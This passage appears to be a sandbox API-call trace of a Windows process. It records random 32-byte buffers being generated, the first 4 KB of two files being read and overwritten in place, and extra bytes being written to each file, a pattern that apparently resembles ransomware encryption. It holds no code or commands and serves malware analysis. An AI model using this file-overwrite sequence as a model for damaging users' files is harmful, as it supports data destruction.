[0086.629] GetProcessHeap () returned 0x4f10000 [0086.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0086.630] GetProcessHeap () returned 0x4f10000 [0086.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0086.630] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0086.630] GetProcessHeap () returned 0x4f10000 [0086.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0086.630] ReadFile (in: hFile=0xa0c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0086.694] SetFilePointerEx (in: hFile=0xa0c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.694] WriteFile (in: hFile=0xa0c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0086.694] GetProcessHeap () returned 0x4f10000 [0086.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0086.694] GetProcessHeap () returned 0x4f10000 [0086.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.694] GetProcessHeap () returned 0x4f10000 [0086.694] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0086.694] GetProcessHeap () returned 0x4f10000 [0086.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.695] GetProcessHeap () returned 0x4f10000 [0086.695] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0086.696] GetProcessHeap () returned 0x4f10000 [0086.696] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.697] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.697] GetProcessHeap () returned 0x4f10000 [0086.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.698] GetProcessHeap () returned 0x4f10000 [0086.698] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.699] GetProcessHeap () returned 0x4f10000 [0086.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.699] GetProcessHeap () returned 0x4f10000 [0086.699] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0086.699] GetProcessHeap () returned 0x4f10000 [0086.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.699] GetProcessHeap () returned 0x4f10000 [0086.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0086.699] GetProcessHeap () returned 0x4f10000 [0086.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0086.699] GetProcessHeap () returned 0x4f10000 [0086.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0086.699] GetProcessHeap () returned 0x4f10000 [0086.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0086.699] SetFilePointerEx (in: hFile=0xa0c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.699] WriteFile (in: hFile=0xa0c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0086.699] WriteFile (in: hFile=0xa0c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0086.699] GetProcessHeap () returned 0x4f10000 [0086.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0086.699] GetProcessHeap () returned 0x4f10000 [0086.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0086.699] GetProcessHeap () returned 0x4f10000 [0086.699] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0086.699] CloseHandle (hObject=0xa0c) returned 1 [0086.701] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 165 [0086.701] SetFilePointerEx (in: hFile=0xa10, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.701] ReadFile (in: hFile=0xa10, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0086.701] SetFilePointerEx (in: hFile=0xa10, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.701] GetProcessHeap () returned 0x4f10000 [0086.701] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0086.701] GetProcessHeap () returned 0x4f10000 [0086.701] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0086.701] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0086.701] GetProcessHeap () returned 0x4f10000 [0086.701] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0086.701] ReadFile (in: hFile=0xa10, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0086.794] SetFilePointerEx (in: hFile=0xa10, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.794] WriteFile (in: hFile=0xa10, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0086.794] GetProcessHeap () returned 0x4f10000 [0086.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0086.794] GetProcessHeap () returned 0x4f10000 [0086.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.794] GetProcessHeap () returned 0x4f10000 [0086.794] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0086.794] GetProcessHeap () returned 0x4f10000 [0086.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.794] GetProcessHeap () returned 0x4f10000 [0086.794] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0086.794] GetProcessHeap () returned 0x4f10000 [0086.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.794] GetProcessHeap () returned 0x4f10000 [0086.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.794] GetProcessHeap () returned 0x4f10000 [0086.794] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.794] GetProcessHeap () returned 0x4f10000 [0086.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.794] GetProcessHeap () returned 0x4f10000 [0086.794] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.794] GetProcessHeap () returned 0x4f10000 [0086.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.795] GetProcessHeap () returned 0x4f10000 [0086.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.796] GetProcessHeap () returned 0x4f10000 [0086.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.797] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.797] GetProcessHeap () returned 0x4f10000 [0086.798] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, 